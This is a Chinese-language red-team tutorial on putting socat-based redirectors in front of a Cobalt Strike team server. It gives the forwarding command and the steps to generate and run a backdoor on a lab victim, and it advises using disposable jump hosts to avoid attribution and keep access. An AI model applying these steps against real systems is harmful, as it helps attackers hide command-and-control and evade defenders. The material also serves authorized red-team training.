0x01 重定向器

重定向器是位于你的目标网络和你的团队服务器之间的系统。任何去往重定向器的连接将转发到你的团队服务器进行处理。通过重定向器,可以为你的 Beacon payload 提供多个回连主机。使用重定向器有助于提升行为安全,因为它会使溯源团队服务器的真实地址变得更加困难。

C2 Redirectors,就是在现有的C2上增加一个中转服务器,这个中转服务器起到功能和流量分离的作用,C2流量可以被中转到不同战术意义的服务器,比如打完就走的短期C2、需要长期控制驻留的C2和邮件钓鱼服务器等。

这个 C2 重定向器相当于位于团队服务器这个控制端和失陷主机之间的中转跳板。外界只能看到重定向器(跳板),一旦重定向器暴露可以被随时抛弃,除非重定向器被反制,否则很难追踪到背后真正的控制者。

摘自:A-TEAM《CobaltStrike4.0用户手册_中文翻译》

0x02 演示环境

  • 团队服务器:192.168.158.129
  • 跳板机:192.168.158.131
  • 受害机:10.211.55.3

0x03 使用教程

Cobalt Strike 的监听器管理功能支持使用重定向器。当你设置一个 HTTP 或 HTTPS Beacon 监听器的 时候,简单的指定你的重定向器 IP (在 Host 字段填入跳板机IP)。Cobalt Strike 不会验证这个信息。如果你提供的 Host 不隶属于当前主机(不是团队服务器的 IP),那么 Cobalt Strike 就假设它是重定向器。 可以使用 socat工具将服务器转变为重定向器。

在跳板机上安装socat工具并执行如下命令:

socat TCP4-LISTEN:80,fork TCP4:192.168.158.129:80#作用:将跳板机80端口上的所有连接转发到的团队服务器IP(192.168.158.129)的 80端口

设置好重定向器之后,新建一个监听器(HTTP Beacon),并把重定向器跳板机IP添加到HTTP Hosts列表中

选择菜单栏-攻击-生成后门-WindowsExecutable-监听器(redirect_http)-Generate生成后门文件

将后门文件放到受害主机中运行后,可以看到此时受害机上只能看到上线CS的外部地址为跳板机IP,而不是团队服务器的真实IP

在CS中也可以看到上线主机的外部IP也是重定向器跳板机的IP,获取到的shell依旧可以正常运作。

在实际情况中可以添加多个重定向器跳板机IP,每个跳板机均使用 socat重定向到团队服务器即可。即使其中的某一个IP被封禁或者是其他原因不可用了,只要其他跳板机IP还在运作,就依然可以维持目标上线CS。

参考文章

  • https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf

CobaltStrike 重定向器IP防溯源相关推荐

  1. squid第11章 重定向器

    原贴:http://www.opendigest.org/article.php/297 第11章 重定向器 11.1 重定向器接口 11.1.1 处理包含空格的URI 11.1.2 产生HTTP重定 ...

  2. Squid中文权威指南-第11章 重定向器

    重定向器是squid的外部程序,它重写来自客户请求的URI.例如,尽管某个用户请求这个页面:http://www.example.com/page1.html ,重定向器可以将请求改变到别的地方,例如 ...

  3. 浅谈溯源反制与防溯源

    本文不涉及实际溯源.防溯源的详细操作过程,仅有基础方向引导,本文篇幅过长,请在家长的陪同下观看,谢谢大家 前言: 最近有个好兄弟问我,获取攻击者的人物画像需要多长时间,我的回答是,无异于天方夜谭. 那 ...

  4. 阴阳师手游如何用云手机无限多开换IP防封

    <阴阳师>的和风元素是网易游戏中是以<源氏物语>的古日本平安时代为背景设计的.游戏剧情以日本平安时代为背景,讲述了阴阳师安倍晴明于人鬼交织的阴阳两界中,探寻自身记忆的故事. 这 ...

  5. java 使用Guava的RateLimiter做接口限流+redis的lua脚本做IP防刷

    需求: 每个IP在指定的时间内可以请求某一个接口多少次,如果请求次数超过指定数,就返回拒绝信息 没做IP防刷之前,请求多了之后服务蹦了 做防刷之后 当然,还有限流 直接上代码  接口注解代码: imp ...

  6. 修改app绕过模拟器检测_游戏搬砖怎样换IP防封?有几种处理方法?|游戏|ip|手游|模拟器...

    任何游戏搬砖的盈利,它的前提条件全是创建在不封禁的基础性上.那你为何要减少封禁概率呢?是由于游戏疯起来一切正常的游戏玩家都是会封.如今你来聊一下下游戏搬砖封禁难题. 在程序猿的角度观察封禁与防封便是攻 ...

  7. 神武授权位置服务器,神武4端游多开切换ip防封最新搬砖思路

    神武4游戏讲述了在九黎妖魔卷土重来之际,三界少侠披坚执锐.铲除九黎妖魔.维护三界安定的故事,玩家可以扮演无名.天策.佛门.方寸.天宫.五庄.龙宫.普陀.万兽.盘丝.天魔.魔王.地府等门派职业,去与九黎 ...

  8. 易语言单窗口单ip教程_手游搬砖经验单窗口单IP防封黄金法则

    手游封号的原因,无非就这些,可以看看. 一,手游工作室肯定能赚钱,不赚钱谁做. 二,一定有封号,封了再起,我们能做的只是尽量减少封号和延缓封号时间. 三,模拟器多开必封,封号速度只是时间问题,一般新出 ...

  9. 分享IP防封的经验技巧

    刚入行的小朋友可能都在问怎么解决手机单机单IP的问题.防封是一个系统的工程,具体的技术贴,已经有大神讲解过很实用的技术干货,我就不重复了. 解决单机单ip常用的方案: 1.一线多拨+软路由:优点:流量 ...

最新文章

  1. 题目:查找数组中的重复数字,要求空间复杂度为O(1)(基于Java实现)
  2. SNDA(上海)招聘中、高级ASP.NET开发人员(2名)
  3. springboot整合postgresql_SpringBoot+JPA+PostgreSQL整合问题
  4. 题目1:学生成绩档案管理系统(实验准备)
  5. 关于vmware 桥接 不识别无线网卡 问题解决方案
  6. Android之抓取adb logcat全日志后怎么过滤掉只包含当前app进程的日志(一般抓启动app奔溃日志)
  7. Modbus协议栈开发笔记之五:Modbus RTU Slave开发
  8. objective-c 语法快速过(4)
  9. js 和 css动画
  10. Android退出程序时的再按一次退出实现
  11. codeforces 812B. Sagheer, the Hausmeister
  12. 基于STM32构建EtherCAT主站(SOEM方案)2
  13. 适用于protel99SE初学者
  14. 上海智能交通建设现状与未来发展要点
  15. kelvin模型蠕变方程_开尔文模型.ppt
  16. vue基于webpack-theme-color-replacer 线上实时修改antd element ui主题色
  17. 统计学中的quartile
  18. pr中导出视频的应用,快速制作竖版短视频
  19. 百度刚刚晋升的29岁最年轻副总裁李明远
  20. 如何申请开通个人邮箱?

热门文章

  1. 了解GAC:从“找不到Microsoft.SqlServer.SqlClrProvider.dll”的问题开始
  2. Elmedia Player - Mac 上最好用的音视屏媒体播放器
  3. 计算机科学期刊和山西大学学报比较,山西大学学报是核心期刊吗_山西大学是211吗_山西大学...
  4. 因特网计算机地址被称为什么,因特网上每台计算机有一个规定的“地址”,这个地址被称为地址.A.TCPB.IPC.WebD.以上都不对...
  5. threeJS对光有反应的材质
  6. 关于数据埋点的基础认识
  7. Python制作发票自动校核微信机器人
  8. 【论文笔记】Incorporating Learnable Membrane Time Constant to Enhance Learning of SNN
  9. 使用c语言求1-100以内素数之和
  10. [运维] proxmox ve 与 vSphere 对比